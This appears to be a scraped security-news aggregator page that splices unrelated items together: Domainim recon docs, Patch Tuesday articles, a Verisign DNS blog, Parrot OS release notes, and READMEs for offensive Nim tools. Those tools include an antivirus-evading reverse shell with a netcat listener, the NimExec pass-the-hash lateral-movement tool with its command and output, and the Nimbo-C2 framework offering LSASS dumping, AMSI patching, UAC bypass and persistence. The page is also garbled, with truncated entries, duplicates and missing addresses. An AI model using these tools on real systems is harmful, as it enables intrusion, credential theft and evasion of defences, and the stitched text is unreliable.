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Domainim - A Fast And Comprehensive Tool For Organizational Network Scanning

By: Zion3R

Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.


Current features (v1.0.1)- - Subdomain enumeration (2 engines + bruteforcing) - User-friendly output - Resolving A records (IPv4)

A fast and comprehensive tool for organizational network scanning (6)

A fast and comprehensive tool for organizational network scanning (7)

  • Virtual hostname enumeration
  • Reverse DNS lookup

A fast and comprehensive tool for organizational network scanning (8)

  • Detects wildcard subdomains (for bruteforcing)

A fast and comprehensive tool for organizational network scanning (9)

  • Basic TCP port scanning
  • Subdomains are accepted as input

A fast and comprehensive tool for organizational network scanning (10)

  • Export results to JSON file

A fast and comprehensive tool for organizational network scanning (11)

A few features are work in progress. See Planned features for more details.

The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.


You can build this repo from source- - Clone the repository

git clone
  • Build the binary
nimble build
  • Run the binary
./domainim <domain> [--ports=<ports>]

Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.


./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
  • <domain> is the domain to be enumerated. It can be a subdomain as well.
  • -- ports | -p is a string speicification of the ports to be scanned. It can be one of the following-
  • all - Scan all ports (1-65535)
  • none - Skip port scanning (default)
  • t<n> - Scan top n ports (same as nmap). i.e. t100 scans top 100 ports. Max value is 5000. If n is greater than 5000, it will be set to 5000.
  • single value - Scan a single port. i.e. 80 scans port 80
  • range value - Scan a range of ports. i.e. 80-100 scans ports 80 to 100
  • comma separated values - Scan multiple ports. i.e. 80,443,8080 scans ports 80, 443 and 8080
  • combination - Scan a combination of the above. i.e. 80,443,8080-8090,t500 scans ports 80, 443, 8080 to 8090 and top 500 ports
  • --dns | -d is the address of the dns server. This should be a valid IPv4 address and can optionally contain the port number-
  • a.b.c.d - Use DNS server at a.b.c.d on port 53
  • a.b.c.d#n - Use DNS server at a.b.c.d on port e
  • --wordlist | -l - Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.
  • --rps | -r - Number of requests to be made per second during bruteforce. The default value is 1024 req/s. It is to be noted that, DNS queries are made in batches and next batch is made only after the previous one is completed. Since quries can be rate limited, increasing the value does not always guarantee faster results.
  • --out | -o - Path to the output file. The output will be saved in JSON format. The filename must end with .json.

Examples - ./domainim --ports=all - ./domainim --ports=none --dns= - ./domainim --ports=t100 --wordlist=wordlist.txt --rps=1500 - ./domainim --ports=t100 --wordlist=wordlist.txt --outfile=results.json - ./domainim --ports=t50,5432,7000-9000 --dns=

The help menu can be accessed using ./domainim --help or ./domainim -h.

domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
domainim (-h | --help)

-h, --help Show this screen.
-p, --ports Ports to scan. [default: `none`]
Can be `all`, `none`, `t<n>`, single value, range value, combination
-l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
-d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
-r, --rps DNS queries to be made per second [default: 1024 req/s]
-o, --out JSON file where the output will be saved. Filename must end with `.json`

domainim -p:t500 -l:wordlist.txt --dns: --out=results.json
domainim --ports=all --dns: -t:1500 -o:results.json

The JSON schema for the results is as follows-

"subdomain": string,
"data": [
"ipv4": string,
"vhosts": [string],
"reverse_dns": string,
"ports": [int]

Example json for can be found here.


Contributions are welcome. Feel free to open a pull request or an issue.

Planned Features

  • [x] TCP port scanning
  • [ ] UDP port scanning support
  • [ ] Resolve AAAA records (IPv6)
  • [x] Custom DNS server
  • [x] Add bruteforcing subdomains using a wordlist
  • [ ] Force bruteforcing (even if wildcard subdomain is found)
  • [ ] Add more engines for subdomain enumeration
  • [x] File output (JSON)
  • [ ] Multiple domain enumeration
  • [ ] Dir and File busting


  • [x] Update verbose output when encountering errors (v0.2.0)
  • [x] Show progress bar for longer operations
  • [ ] Add individual port scan progress bar
  • [ ] Add tests
  • [ ] Add comments and docstrings

Additional Notes

This project is still in its early stages. There are several limitations I am aware of.

The two engines I am using (I'm calling them engine because Sublist3r does so) currently have some sort of response limit.">dnsdumpster can fetch upto 100 subdomains. also randomizes the results in case of too many results. Another issue with is the fact that it returns some SQL error sometimes. So for some domain, results can be different for different runs. I am planning to add more engines in the future (at least a brute force engine).

The port scanner has only ping response time + 750ms timeout. This might lead to false negatives. Since, domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).

It might seem that the way vhostnames are printed, it just brings repeition on the table.

A fast and comprehensive tool for organizational network scanning (12)

Printing as the following might've been better-,,,,,,
↳ Reverse DNS:

But previously while testing, I found cases where not all IPs are shared by same set of vhostnames. That is why I decided to keep it this way.

A fast and comprehensive tool for organizational network scanning (13)

DNS server might have some sort of rate limiting. That's why I added random delays (between 0-300ms) for IPv4 resolving per query. This is to not make the DNS server get all the queries at once but rather in a more natural way. For bruteforcing method, the value is between 0-1000ms by default but that can be changed using --rps | -t flag.

One particular limitation that is bugging me is that the DNS resolver would not return all the IPs for a domain. So it is necessary to make multiple queries to get all (or most) of the IPs. But then again, it is not possible to know how many IPs are there for a domain. I still have to come up with a solution for this. Also, nim-ndns doesn't support CNAME records. So, if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author for this.

For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing will resolve IPv4 for all possible subdomains. However, this will skip valid subdomains also (i.e. will be skipped even though it's not a wildcard value). I will add a --force-brute | -fb flag later to force bruteforcing.

Similar thing is true for VHost enumeration for subdomain inputs. Since, urls that ends with given subdomains are returned, subdomains of similar domains are not considered. For example, will not be printed for but might be. I can search for all subdomains of but that defeats the purpose of having a subdomains as an input.


MIT License. See LICENSE for full text.

Patch Tuesday, May 2024 Edition

Microsoft today released updates to fix more than 60 security holes in Windows computers and supported software, including two “zero-day” vulnerabilities in Windows that are already being exploited in active attacks. There are also important security patches available for macOS and Adobe users, and for the Chrome Web browser, which just patched its own zero-day flaw.

First, the zero-days. CVE-2024-30051 is an “elevation of privilege” bug in a core Windows library. Satnam Narang at Tenable said this flaw is being used as part of post-compromise activity to elevate privileges as a local attacker.

“CVE-2024-30051 is used to gain initial access into a target environment and requires the use of social engineering tactics via email, social media or instant messaging to convince a target to open a specially crafted document file,” Narang said. “Once exploited, the attacker can bypass OLE mitigations in Microsoft 365 and Microsoft Office, which are security features designed to protect end users from malicious files.”

Kaspersky Lab, one of two companies credited with reporting exploitation of CVE-2024-30051 to Microsoft, has published a fascinating writeup on how they discovered the exploit in a file shared with

Kaspersky said it has since seen the exploit used together with QakBot and other malware. Emerging in 2007 as a banking trojan, QakBot (a.k.a. Qbot and Pinkslipbot) has morphed into an advanced malware strain now used by multiple cybercriminal groups to prepare newly compromised networks for ransomware infestations.

CVE-2024-30040 is a security feature bypass in MSHTML, a component that is deeply tied to the default Web browser on Windows systems. Microsoft’s advisory on this flaw is fairly sparse, but Kevin Breen from Immersive Labs said this vulnerability also affects Office 365 and Microsoft Office applications.

“Very little information is provided and the short description is painfully obtuse,” Breen said of Microsoft’s advisory on CVE-2024-30040.

The only vulnerability fixed this month that earned Microsoft’s most-dire “critical” rating is CVE-2024-30044, a flaw in Sharepoint that Microsoft said is likely to be exploited. Tenable’s Narang notes that exploitation of this bug requires an attacker to be authenticated to a vulnerable SharePoint Server with Site Owner permissions (or higher) first and to take additional steps in order to exploit this flaw, which makes this flaw less likely to be widely exploited as most attackers follow the path of least resistance.

Five days ago, Google released a security update for Chrome that fixes a zero-day in the popular browser. Chrome usually auto-downloads any available updates, but it still may require a complete restart of the browser to install them. If you use Chrome and see a “Relaunch to update” message in the upper right corner of the browser, it’s time to restart.

Apple has just shipped macOS Sonoma 14.5 update, which includes nearly two dozen security patches. To ensure your Mac is up-to-date, go to System Settings, General tab, then Software Update and follow any prompts.

Finally, Adobe has critical security patches available for a range of products, including Acrobat, Reader, Illustrator, Adobe Substance 3D Painter, Adobe Aero, Adobe Animate and Adobe Framemaker.

Regardless of whether you use a Mac or Windows system (or something else), it’s always a good idea to backup your data and or system before applying any security updates. For a closer look at the individual fixes released by Microsoft today, check out the complete list over at the SANS Internet Storm Center. Anyone in charge of maintaining Windows systems in an enterprise environment should keep an eye on, which usually has the scoop on any wonky Windows patches.

Update, May 15, 8:28 a.m.: Corrected misattribution of CVE-2024-30051.

Patch Tuesday, March 2024 Edition

Apple and Microsoft recently released software updates to fix dozens of security holes in their operating systems. Microsoft today patched at least 60 vulnerabilities in its Windows OS. Meanwhile, Apple’s new macOS Sonoma addresses at least 68 security weaknesses, and its latest update for iOS fixes two zero-day flaws.

Last week, Apple pushed out an urgent software update to its flagship iOS platform, warning that there were at least two zero-day exploits for vulnerabilities being used in the wild (CVE-2024-23225 and CVE-2024-23296). The security updates are available in iOS 17.4, iPadOS 17.4, and iOS 16.7.6.

Apple’s macOS Sonoma 14.4 Security Update addresses dozens of security issues. Jason Kitka, chief information security officer at Automox, said the vulnerabilities patched in this update often stem from memory safety issues, a concern that has led to a broader industry conversation about the adoption of memory-safe programming languages [full disclosure: Automox is an advertiser on this site].

On Feb. 26, 2024, the Biden administration issued a report that calls for greater adoption of memory-safe programming languages. On Mar. 4, 2024, Google published Secure by Design, which lays out the company’s perspective on memory safety risks.

Mercifully, there do not appear to be any zero-day threats hounding Windows users this month (at least not yet). Satnam Narang, senior staff research engineer at Tenable, notes that of the 60 CVEs in this month’s Patch Tuesday release, only six are considered “more likely to be exploited” according to Microsoft.

Those more likely to be exploited bugs are mostly “elevation of privilege vulnerabilities” including CVE-2024-26182 (Windows Kernel), CVE-2024-26170 (Windows Composite Image File System (CimFS), CVE-2024-21437 (Windows Graphics Component), and CVE-2024-21433 (Windows Print Spooler).

Narang highlighted CVE-2024-21390 as a particularly interesting vulnerability in this month’s Patch Tuesday release, which is an elevation of privilege flaw in Microsoft Authenticator, the software giant’s app for multi-factor authentication. Narang said a prerequisite for an attacker to exploit this flaw is to already have a presence on the device either through malware or a malicious application.

“If a victim has closed and re-opened the Microsoft Authenticator app, an attacker could obtain multi-factor authentication codes and modify or delete accounts from the app,” Narang said. “Having access to a target device is bad enough as they can monitor keystrokes, steal data and redirect users to phishing websites, but if the goal is to remain stealth, they could maintain this access and steal multi-factor authentication codes in order to login to sensitive accounts, steal data or hijack the accounts altogether by changing passwords and replacing the multi-factor authentication device, effectively locking the user out of their accounts.”

CVE-2024-21334 earned a CVSS (danger) score of 9.8 (10 is the worst), and it concerns a weakness in Open Management Infrastructure (OMI), a Linux-based cloud infrastructure in Microsoft Azure. Microsoft says attackers could connect to OMI instances over the Internet without authentication, and then send specially crafted data packets to gain remote code execution on the host device.

CVE-2024-21435 is a CVSS 8.8 vulnerability in Windows OLE, which acts as a kind of backbone for a great deal of communication between applications that people use every day on Windows, said Ben McCarthy, lead cybersecurity engineer at Immersive Labs.

“With this vulnerability, there is an exploit that allows remote code execution, the attacker needs to trick a user into opening a document, this document will exploit the OLE engine to download a malicious DLL to gain code execution on the system,” Breen explained. “The attack complexity has been described as low meaning there is less of a barrier to entry for attackers.”

A full list of the vulnerabilities addressed by Microsoft this month is available at the SANS Internet Storm Center, which breaks down the updates by severity and urgency.

Finally, Adobe today issued security updates that fix dozens of security holes in a wide range of products, including Adobe Experience Manager, Adobe Premiere Pro, ColdFusion 2023 and 2021, Adobe Bridge, Lightroom, and Adobe Animate. Adobe said it is not aware of active exploitation against any of the flaws.

By the way, Adobe recently enrolled all of its Acrobat users into a “new generative AI feature” that scans the contents of your PDFs so that its new “AI Assistant” can  “understand your questions and provide responses based on the content of your PDF file.” Adobe provides instructions on how to disable the AI features and opt out here.

New Coyote Trojan Targets 61 Brazilian Banks with Nim-Powered Attack

Sixty-one banking institutions, all of them originating from Brazil, are the target of a new banking trojan called&nbsp;Coyote. "This malware utilizes the Squirrel installer for distribution, leveraging Node.js and a relatively new multi-platform programming language called Nim as a loader to complete its infection," Russian cybersecurity firm Kaspersky&nbsp;said&nbsp;in a Thursday report. What

Nim-Shell - Reverse Shell That Can Bypass Windows Defender Detection

By: Zion3R

Reverse shell that can bypass windows defender detection

$ apt install nim


nim c -d:mingw --app:gui nimshell.nim

Change the IP address and port number you want to listen to in the nimshell.nim file according to your device.

and listen

 $ nc -nvlp 4444

NimExec - Fileless Command Execution For Lateral Movement In Nim

By: Zion3R

Basically, NimExec is a fileless remote command execution tool that uses The Service Control Manager Remote Protocol (MS-SCMR). It changes the binary path of a random or given service run by LocalSystem to execute the given command on the target and restores it later via hand-crafted RPC packets instead of WinAPI calls. It sends these packages over SMB2 and the svcctl named pipe.

NimExec needs an NTLM hash to authenticate to the target machine and then completes this authentication process with the NTLM Authentication method over hand-crafted packages.

Since all required network packages are manually crafted and no operating system-specific functions are used, NimExec can be used in different operating systems by using Nim's cross-compilability support.

This project was inspired by Julio's SharpNoPSExec tool. You can think that NimExec is Cross Compilable and built-in Pass the Hash supported version of SharpNoPSExec. Also, I learned the required network packet structures from Kevin Robertson's Invoke-SMBExec Script.


nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim

The above command uses a different Garbage Collector because the default garbage collector in Nim is throwing some SIGSEGV errors during the service searching process.

Also, you can install the required Nim modules via Nimble with the following command:

nimble install ptr_math nimcrypto hostname


test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v

_..._ .--. __ __ ___ __.....__ __.....__ .' .' '.\
.' '. |__|| |/ `.' `. .-'' '. .-'' '. / .'
. .-. ..--.| .-. .-. ' / .-''"'-. `. / .-''"'-. `. . '
| ' ' || || | | | | |/ /________\ \ ____ _____/ /________\ \| |
| | | || || | | | | || |`. \ .' /| || |
| | | || || | | | | |\ .--- ----------' `. `' .' \ .-------------'. '
| | | || || | | | | | \ '-.____...---. '. .' \ '-.____...---. \ '. .
| | | ||__||__| |__| |__| `. .' .' `. `. .' '. `._____.-'/
| | | | `''-...... -' .' .'`. `. `''-...... -' `-.______ /
| | | | .' / `. `. `
'--' '--' '----' '----'


[+] Connected to
[+] NTLM Authentication with Hash is succesfull!
[+] Connected to IPC Share of target!
[+] Opened a handle for svcctl pipe!
[+] Bound to the RPC Interface!
[+] RPC Binding is acknowledged!
[+] SCManager handle is obtained!
[+] Number of obtained services: 265
[+] Selected service is LxpSvc
[+] Service: LxpSvc is opened!
[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs
[+] Service config is changed!
[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)
[+] Service start request is sent!
[+] Service config is restored!
[+] Service handle is closed!
[+] Service Manager handle is closed!
[+] SMB is closed!
[+] Tree is disconnected!
[+] Session logoff!

It's tested against Windows 10&11, Windows Server 16&19&22 from Ubuntu 20.04 and Windows 10 machines.

Command Line Parameters

    -v | --verbose                          Enable more verbose output.
-u | --username <Username> Username for NTLM Authentication.*
-h | --hash <NTLM Hash> NTLM password hash for NTLM Authentication.*
-t | --target <Target> Lateral movement target.*
-c | --command <Command> Command to execute.*
-d | --domain <Domain> Domain name for NTLM Authentication.
-s | --service <Service Name> Name of the service instead of a random one.
--help Show the help message.


Telegram’s Bans on Extremist Channels Aren't Really Bans

A WIRED analysis of more than 100 restricted channels shows these communities remain active, and content shared within them often spreads to channels accessible to the public.

Nimbo-C2 - Yet Another (Simple And Lightweight) C2 Framework

By: Zion3R


Nimbo-C2 is yet another (simple and lightweight) C2 framework.

Nimbo-C2 agent supports x64 Windows & Linux. It's written in Nim, with some usage of .NET on Windows (by dynamically loading the CLR to the process). Nim is powerful, but interacting with Windows is much easier and robust using Powershell, hence this combination is made. The Linux agent is slimer and capable only of basic commands, including ELF loading using the memfd technique.

All server components are written in Python:

  • HTTP listener that manages the agents.
  • Builder that generates the agent payloads.
  • Nimbo-C2 is the interactive C2 component that rule'em all!

My work wouldn't be possible without the previous great work done by others, listed under credits.


  • Build EXE, DLL, ELF payloads.
  • Encrypted implant configuration and strings using NimProtect.
  • Packing payloads using UPX and obfuscate the PE section names (UPX0, UPX1) to make detection and unpacking harder.
  • Encrypted HTTP communication (AES in CBC mode, key hardcoded in the agent and configurable by the config.jsonc).
  • Auto-completion in the C2 Console for convenient interaction.
  • In-memory Powershell commands execution.
  • File download and upload commands.
  • Built-in discovery commands.
  • Screenshot taking, clipboard stealing, audio recording.
  • Memory evasion techniques like NTDLL unhooking, ETW & AMSI patching.
  • LSASS and SAM hives dumping.
  • Shellcode injection.
  • Inline .NET assemblies execution.
  • Persistence capabilities.
  • UAC bypass methods.
  • ELF loading using memfd in 2 modes.
  • And more !


Easy Way

  1. Clone the repository and cd in
git clone
cd Nimbo-C2
  1. Build the docker image
docker build -t nimbo-dependencies .
  1. cd again into the source files and run the docker image interactively, expose port 80 and mount Nimbo-C2 directory to the container (so you can easily access all project files, modify config.jsonc, download and upload files from agents, etc.). For Linux replace ${pwd} with $(pwd).
cd Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 nimbo-dependencies

Easier Way

git clone
cd Nimbo-C2/Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 itaymigdal/nimbo-dependencies


First, edit config.jsonc for your needs.

Then run with: python3

Use the help command for each screen, and tab completion.

Also, check the examples directory.

Main Window

Nimbo-C2 > help

--== Agent ==--
agent list -> list active agents
agent interact <agent-id> -> interact with the agent
agent remove <agent-id> -> remove agent data

--== Builder ==--
build exe -> build exe agent (-h for help)
build dll -> build dll agent (-h for help)
build elf -> build elf agent (-h for help)

--== Listener ==--
listener start -> start the listener
listener stop -> stop the listener
listener status -> print the listener status

--== General ==--
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2
</ div>

Agent Window

Windows agent

Nimbo-2 [d337c406] > help

--== Send Commands ==--
cmd <shell-command> -> execute a shell command
iex <powershell-scriptblock> -> execute in-memory powershell command

--== File Stuff ==--
download <remote-file> -> download a file from the agent (wrap path with quotes)
upload <loal-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)

--== Discovery Stuff ==--
pstree -> show process tree
checksec -> check for security products
software -> check for installed software

--== Collection Stuff ==--
clipboard -> retrieve clipboard
screenshot -> retrieve screenshot
audio <record-time> -> record audio

--== Post Exploitation Stuff ==--
lsass <method> -> dump lsass.exe [methods: direct,comsvcs] (elevation required)
sam -> dump sam,security,system hives using reg.exe (elevation required)
shellc <raw-shellcode-file> <pid> -> inject shellcode to remote process
assembly <local-assembly> <args> -> execute .net assembly (pass all args as a single string using quotes)
warning: make sure the assembly doesn't call any exit function

--== Evasion Stuff ==--
unhook -> unhook ntdll.dll
amsi -> patch amsi out of the current process
etw -> patch etw out of the current process

--== Persistence Stuff ==--
persist run <command> <key-name> -> set run key (will try first hklm, then hkcu)
persist spe <command> <process-name> -> persist using silent process exit technique (elevation required)

--== Privesc Stuff ==--
uac fodhelper <command> <keep/die> -> elevate session using the fodhelper uac bypass technique
uac sdclt <command> <keep/die> -> elevate session using the sdclt uac bypass technique

--== Interaction stuff ==--
msgbox <title> <text> -> pop a message box (blocking! waits for enter press)
speak <text> -> speak using sapi.spvoice com interface

--== Communication Stuff ==--
sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
clear -> clear pending commands
collect -> recollect agent data
kill -> kill the agent (persistence will still take place)

--== General ==--
show -> show agent details
back -> back to main screen
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2

Linux agent

Nimbo-2 [51a33cb9] > help

--== Send Commands ==--
cmd <shell-command> -> execute a terminal command

--== File Stuff ==--
download <remote-file> -> download a file from the agent (wrap path with quotes)
upload <local-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)

--== Post Exploitation Stuff ==--
memfd <mode> <elf-file> <commandline> -> load elf in-memory using the memfd_create syscall
implant mode: load the elf as a child process and return
task mode: load the elf as a child process, wait on it, and get its output when it's done
(pass the whole commandline as a single string using quotes)

--== Communication Stuff ==--
sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
clear -> clear pending commands
collect -> recollect agent data
kill -> kill the agent (persistence will still take place)

--== General ==--
show -> show agent details
back -> back to main screen
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2

Limitations & Warnings

  • Even though the HTTP communication is encrypted, the 'user-agent' header is in plain text and it carries the real agent id, which some products may flag it suspicious.
  • When using assembly command, make sure your assembly doesn't call any exit function because it will kill the agent.
  • shellc command may unexpectedly crash or change the injected process behavior, test the shellcode and the target process first.
  • audio, lsass and sam commands temporarily save artifacts to disk before exfiltrate and delete them.
  • Cleaning the persist commands should be done manually.
  • Specify whether to keep or kill the initiating agent process in the uac commands. die flag may leave you with no active agent (if the unelevated agent thinks that the UAC bypass was successful, and it wasn't), keep should leave you with 2 active agents probing the C2, then you should manually kill the unelevated.
  • msgbox is blocking, until the user will press the ok button.


This software may be buggy or unstable in some use cases as it not being fully and constantly tested. Feel free to open issues, PR's, and contact me for any reason at (Gmail | Linkedin | Twitter).


  • OffensiveNim - Great resource that taught me a lot about leveraging Nim for implant tasks. Some of Nimbo-C2 agent capabilities are basically wrappers around OffensiveNim modified examples.
  • Python-Prompt-Toolkit-3 - Awsome library for developing python CLI applications. Developed the Nimbo-C2 interactive console using this.
  • ascii-image-converter - For the awsome Nimbo ascii art.
  • All those random people from Github & Stackoverflow that I copy & pasted their code

Minimized DNS Resolution: Into the Penumbra


Over the past several years, domain name queries – a critical element of internet communication – have quietly become more secure, thanks, in large part, to a little-known set of technologies that are having a global impact. Verisign CTO Dr. Burt Kaliski covered these in a recent Internet Protocol Journal article, and I’m excited to share more about the role Verisign has performed in advancing this work and making one particular technology freely available worldwide.

The Domain Name System (DNS) has long followed a traditional approach of answering queries, where resolvers send a query with the same fully qualified domain name to each name server in a chain of referrals. Then, they generally apply the final answer they receive only to the domain name that was queried for in the original request.

But recently, DNS operators have begun to deploy various “minimization techniques” – techniques aimed at reducing both the quantity and sensitivity of information exchanged between DNS ecosystem components as a means of improving DNS security. Why the shift? As we discussed in a previous blog, it’s all in the interest of bringing the process closer to the “need-to-know” security principle, which emphasizes the importance of sharing only the minimum amount of information required to complete a task or carry out a function. This effort is part of a general, larger movement to reduce the disclosure of sensitive information in our digital world.

As part of Verisign’s commitment to security, stability, and resiliency of the global DNS, the company has worked both to develop qname minimization techniques and to encourage the adoption of DNS minimization techniques in general. We believe strongly in this work since these techniques can reduce the sensitivity of DNS data exchanged between resolvers and both root and TLD servers without adding operational risk to authoritative name server operations.

To help advance this area of technology, in 2015, Verisign announced a royalty-free license to its qname minimization patents in connection with certain Internet Engineering Task Force (IETF) standardization efforts. There’s been a steady increase in support and deployment since that time; as of this writing, roughly 67% of probes were utilizing qname-minimizing resolvers, according to statistics hosted by NLnet Labs. That’s up from just 0.7% in May 2017 – a strong indicator of minimization techniques’ usefulness to the community. At Verisign, we are seeing similar trends with approximately 65% of probes utilizing qname-minimizing resolvers in queries with two labels at .com and .net authoritative name servers, as shown in Figure 1 below.

Graph showing percentage of queries with two labels observed at COM/NET authoritative name servers
Figure 1: A domain name consists of one or more labels. For instance, consists of three labels: “www”, “example”, and “com”. This chart suggests that more and more recursive resolvers have implemented qname minimization, which results in fewer queries for domain names with three or more labels. With qname minimization, the resolver would send “,” with two labels, instead of “” with all three.

Kaliski’s article, titled “Minimized DNS Resolution: Into the Penumbra,” explores several specific minimization techniques documented by the IETF, reports on their implementation status, and discusses the effects of their adoption on DNS measurement research. An expanded version of the article can be found on the Verisign website.

This piece is just one of the latest to demonstrate Verisign’s continued investment in research and standards development in the DNS ecosystem. As a company, we’re committed to helping shape the DNS of today and tomorrow, and we recognize this is only possible through ongoing contributions by dedicated members of the internet infrastructure community – including the team here at Verisign.

Read more about Verisign’s contributions to this area:

Query Name Minimization and Authoritative DNS Server Behavior – DNS-OARC Spring ’15 Workshop (presentation)

Minimum Disclosure: What Information Does a Name Server Need to Do Its Job? (blog)

Maximizing Qname Minimization: A New Chapter in DNS Protocol Evolution (blog)

A Balanced DNS Information Protection Strategy: Minimize at Root and TLD, Encrypt When Needed Elsewhere (blog)

Information Protection for the Domain Name System: Encryption and Minimization (blog)

The post Minimized DNS Resolution: Into the Penumbra appeared first on Verisign Blog.

Parrot 5.1 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

Parrot OS 5.1 is officially released. We're proud to say that the new version of Parrot OS 5.1 is available for download; this new version includes a lot of improvements and updates that makes the distribution more performing and more secure.

How do I get Parrot OS?

You can download Parrot OS by clicking here and, as always, we invite you to never trust third part and unofficial sources.

If you need any help or in case the direct downloads don't work for you, we also provide official Torrent files, which can circumvent firewalls and network restrictions in most cases.

How do I upgrade from a previous version?

First of all, we always suggest to update your version for being sure that is stable and functional. You can upgrade an existing system via APT using one of the following commands:

  • sudo parrot-upgrade


  • sudo apt update && sudo apt full-upgrade

Even if we recommend to always update your version, it is also recommended to do a backup and re-install the latest version to have a cleaner and more reliable user experience, especially if you upgrade from a very old version of parrot.

What's new in Parrot OS 5.1

New kernel 5.18.

You can find all the infos about the new Kernel 5.18 by clickig on this link.

Updated docker containers

Our docker offering has been revamped! We now provide our dedicated image registry along with the default one.

All our images are now natively multiarch, and support amd64 and arm64 architectures.

Our containers offering was updated as well, and we are committed to further improve it.

Run docker run --rm -ti --network host -v $PWD/work:/work and give our containers a try without having to install the system, or visit our Docker images page to explore the other containers we offer.

Updated backports.

Several packages were updated and backported, like the new Golang 1.19 or Libreoffice 7.4. This is part of our commitment to provide the latest version of every most important software while choosing a stable LTS release model.

To make sure to have all the latest packages installed from our backports channel, use the following commands:

  • sudo apt update
  • sudo apt full-upgrade -t parrot-backports

System updates

The system has received important updates to some opf its key packages, like parrot-menu, which now provides additional launchers to our newly imported tools; or parrot-core, which now provides a new firefox profile with improved security hardening, plus some minor bugfixes to our zshrc configuration.

Firefox profile overhault

As mentioned earlier, our Firefox profile has received a major update that significantly improves the overall privacy and security.

Our bookmarks collection has been revamped, and now includes new resources, including OSINT services, new learning sources and other useful resources for hackers, developers, students and security researchers.

We have also boosted our effort to avoid Mozilla telemetry and bring DuckDuckGo back as the default search engine, while we are exploring other alternatives for the future.

Tools updates

Most of our tools have received major version updates, especially our reverse engineering tools, like rizin and rizin-cutter.

Important updates involved metasploit, exploitdb and other popular tools as well.

New AnonSurf 4.0

The new AnonSurf 4 represents a major upgrade for our popular anonymity tool.

Anonsurf is our in-house anonymity solution that routes all the system traffic through TOR automatically without having to set up proxy settings for each individua program, and preventing traffic leaking in most cases.

The new version provides significant fixes and reliability updates, fully supports debian systems without the old resolvconf setup, has a new user interface with improved system tray icon and settings dialog window, and offers a better overall user experience.

Parrot IoT improvements

Our IoT version now implements significant performance improvements for the various Raspberry Pi boards, and finally includes Wi-Fi support for the Raspberry Pi 400 board.

The Parrot IoT offering has also been expanded, and it now offers Home and Security editions as well, with a full MATE desktop environment exactly like the desktop counterpart.

Architect Edition improvements

Our popular Architect Edition now implements some minor bugfixes and is more reliable than ever.

The Architect Edition is a special edition of Parrot that enables the user to install a barebone Parrot Core system, and then offers a selection of additional modules to further customize the system.

You can use Parrot Architect to install other desktop environments like KDE, GNOME or XFCE, or to install a specific selection of tools.

New infrastructure powered by Parrot and Kubernetes

The Architect Edition is also used internally by the Parrot Engineering Team to install Parrot Server Edition on all the servers that power our infrastructure, which is officially 100% powered by Parrot and Kubernetes.

This is a major change in the way we handle our infrastructure, which enables us to implement better autoscaling, easier management, smaller attack surface and an overall better network, with the improved scalability and security we were looking for.

NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy

Get fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls.

The advantage of grabbing Syscalls dynamically is, that the signature of the Stubs is not included in the file and you don't have to worry about changing Windows versions.

To compile the shellcode execution template run the following:

nim c -d:release ShellcodeInject.nim

The result should look like this:

Nim-RunPE - A Nim Implementation Of Reflective PE-Loading From Memory

A Nim implementation of reflective PE-Loading from memory. The base for this code was taken from RunPE-In-Memory - which I ported to Nim.

You'll need to install the following dependencies:

nimble install ptr_math winim

I did test this with Nim Version 1.6.2 only, so use that version for testing or I cannot guarantee no errors when using another version.


If you want to pass arguments on runtime or don't want to pass arguments at all compile via:

nim c NimRunPE.nim

If you want to hardcode custom arguments modify const exeArgs to your needs and compile with:

nim c -d:args NimRunPE.nim - this was contributed by @glynx, thanks!


More Information

The technique itself it pretty old, but I didn't find a Nim implementation yet. So this has changed now. :)

If you plan to load e.g. Mimikatz with this technique - make sure to compile a version from source on your own, as the release binaries don't accept arguments after being loaded reflectively by this loader. Why? I really don't know it's strange but a fact. If you compile on your own it will still work:


My private Packer is also weaponized with this technique - but all Win32 functions are replaced with Syscalls there. That makes the technique stealthier.

NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy

Get fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls.

